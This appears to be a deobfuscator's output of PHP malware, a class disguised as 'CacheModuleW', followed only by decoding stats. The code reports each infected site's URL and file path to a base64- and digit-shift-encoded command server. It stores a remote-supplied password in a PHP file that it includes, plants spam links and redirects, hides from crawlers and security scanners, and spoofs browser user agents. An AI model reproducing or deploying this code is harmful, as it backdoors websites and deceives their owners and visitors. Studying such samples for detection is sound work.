        if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
            $this->ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
        } elseif (!empty($_SERVER['REMOTE_ADDR'])) {
            $this->ip = $_SERVER['REMOTE_ADDR'];
        } else {
            $this->ip = "";
        }
        if (!empty($_SERVER['HTTP_USER_AGENT'])) {
            $this->ua = $_SERVER['HTTP_USER_AGENT'];
        } else {
            $this->ua = "";
        }
        if(
            stripos("qqq".$this->ua, "mj12bot.com")
            || stripos("qqq".$this->ua, "seostar.co/robot")
            || stripos("qqq".$this->ua, "AhrefsBot")
            || stripos("qqq".$this->ua, "DataForSeoBot")
            || stripos("qqq".$this->ua, "The Knowledge AI")
            || stripos("qqq".$this->ua, "SiteLockSpider")
        ) {
            return false;
        }
        if (!empty($_SERVER['HTTP_REFERER'])) {
            $this->ref = $_SERVER['HTTP_REFERER'];
        } else {
            $this->ref = "";
        }
        $this->post = $_POST;
        $this->rid = md5(str_ireplace("www.", "", strtolower($_SERVER['SERVER_NAME'])));
        if (isset($_SERVER['HTTPS'])) {
            $this->protocol = "https://";
        }
        $this->currentUrl = $this->protocol . strtolower($_SERVER['SERVER_NAME']) . strtolower($_SERVER['REQUEST_URI']);
        $this->currentUrl = rtrim($this->currentUrl, "/");
        $this->currentUrl = urldecode($this->currentUrl);
        $this->currentHash = $this->makeHash($this->currentUrl);
        $this->cacheDir = dirname(__FILE__) . "/cache_w";
        $this->checkFile = $this->cacheDir . "/check";
        $this->pFile = $this->cacheDir . "/pfile.php";
        $this->uFile = $this->cacheDir . "/ufile";
        $this->rFile = $this->cacheDir . "/rfile";
        return true;
    }

    private function saveRedirect($data)
    {
        $this->fileAction($this->rFile, "w+", json_encode($data));
    }

    private function install()
    {
        if (stripos("qqq" . $this->currentUrl, ".pdf") || stripos("qqq" . $this->currentUrl, ".xml") || stripos("qqq" . $this->currentUrl, ".pdf")) {
            return false;
        }
        if (!file_exists($this->checkFile)) {
            mkdir($this->cacheDir);
            $this->fileAction($this->checkFile, "w+", time());
            if (file_exists($this->checkFile)) {
                $isSecure = "";
                if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') {
                    $isSecure = "yes";
                }
                $params = "rid=" . $this->rid . "&action=install&url=" . $this->currentUrl . "&path=" . __FILE__."&ssl=".$isSecure;
                $incomeData = $this->goPost($this->au, $params);
                $incomeData = json_decode($incomeData);
                $result = [
                    "type" => "error"
                ];
                if (!empty($incomeData)) {
                    if (!empty($incomeData->postpass)) {
                        $this->savePass($incomeData->postpass);
                    }
                    if (!empty($incomeData->urls)) {
                        foreach ($incomeData->urls as $urlData) {
                            $toSave = [
                                "hash" => $this->makeHash($urlData->url),
                                "url" => urlencode($urlData->url),
                                "keyword" => urlencode($urlData->keyword)
                            ];
                            $this->fileAction($this->uFile, "a+", json_encode($toSave) . "\n");
                        }
                        $result["type"] = "fromurls";
                    }
                    if (!empty($incomeData->redirect)) {
                        $this->saveRedirect($incomeData->redirect);
                    }
                }
            }
        }
        return true;
    }

    private function makeHash($string, $noStr = false)
    {
        $string = rtrim($string, "/");
        if($noStr === false) {
            $string = str_ireplace(
                ["http://", "https//", "www."],
                "",
                $string
            );
        }

        return md5(urlencode($string));
    }

    public function goPost($url, $params, $nocache = false)
    {
        $params = rtrim($params, '&');
        if ($nocache === true) {
            $params .= "&" . $this->postVar . "=yes";
        }
        if (function_exists('curl_init')) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
            curl_setopt($ch, CURLOPT_USERAGENT, $this->rUA());
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_HEADER, false);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
            curl_setopt($ch, CURLOPT_TIMEOUT, 40);
            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
            $output = curl_exec($ch);
            curl_close($ch);
        } else {
            $output = file_get_contents($url, false, stream_context_create(array('http' => array('method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded', 'content' => $params))));
        }
        return $output;

    }

    private function getRandLinks()
    {
        if (!file_exists($this->uFile)) {
            return false;
        }
        $links = [];
        $linesIndArr = array();
        $n = 1;
        $handle = fopen($this->uFile, "r");
        while (!feof($handle)) {
            if (fgets($handle) !== false) {
                $linesIndArr[] = $n++;
            }
        }
        fclose($handle);
        $linesIndArr = $this->shArr($linesIndArr);
        $linesIndArr = array_slice($linesIndArr, 0, rand(4, 6));
        $i = 0;
        $handle = fopen($this->uFile, "r");
        while (!feof($handle)) {
            if (count($links) == count($linesIndArr)) {
                break;
            }
            $line = fgets($handle);
            if ($line !== false && in_array($i, $linesIndArr)) {
                $link = json_decode(trim($line));
                if (!empty($link)) {
                    $link = "<a href='" . urldecode($link->url) . "'>" . urldecode($link->keyword) . "</a>&nbsp;";
                    $links[] = $link;
                }
            }
            $i++;
        }
        fclose($handle);
        return $links;
    }

    function dcdAu($au)
    {
        $goodservurl = array();
        foreach (str_split($au) as $onechar) {
            if (is_numeric($onechar)) {
                if ($onechar >= 3) {
                    $onechar = $onechar - 3;
                } else {
                    $onechar = $onechar + 10 - 3;
                }
            }
            $goodservurl[] = $onechar;
        }
        return urldecode(base64_decode(implode($goodservurl)));
    }

    private function savePass($pass)
    {
        $this->fileAction($this->pFile, "w+", "<?php \$postPass = '" . $pass . "'; ?>");
    }

    private function rUA()
    {
        $uas = array("Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)");
        $uas = $this->shArr($uas);
        return $uas[0];
    }

    private function shArr($arr)
    {
        srand((float)microtime() * 1000000);
        shuffle($arr);
        return $arr;
    }

    private function checkPostPass()
    {
        if (empty($this->post["postpass"])) {
            return false;
        }
        if (file_exists($this->pFile)) {
            @include($this->pFile);
            if (!empty($postPass)) {
                if ($this->post["postpass"] === $postPass) {
                    $this->postPass = $postPass;
                    return true;
                }
            }
        }
        return false;
    }

    private function randString($length)
    {
        $str = "";
        $chars = "abcdefghijklmnopqrstuvwxyz0123456789";
        $size = strlen($chars);
        for ($i = 0; $i < $length; $i++) {
            $str .= $chars[rand(0, $size - 1)];
        }
        return $str;
    }

    private function fileAction($path, $mode, $data)
    {
        $fod = fopen($path, $mode);
        if (!$fod) {
            return false;
        }
        fwrite($fod, $data);
        fclose($fod);
        return true;
    }

}

$au = "aHR3cCUzQSUyRiUyRndvcmxkdHJhZmZpY6JvdXRlLnRvcCUyRmZhcGQyJTJGYXBpJTJGd52yaw==";
new CacheModuleW($au);

Function Calls

None

Variables

None

Stats

MD5 114aaf73d9af5bc34051a2b9f77bf7aa
Eval Count 0
Decode Time 84 ms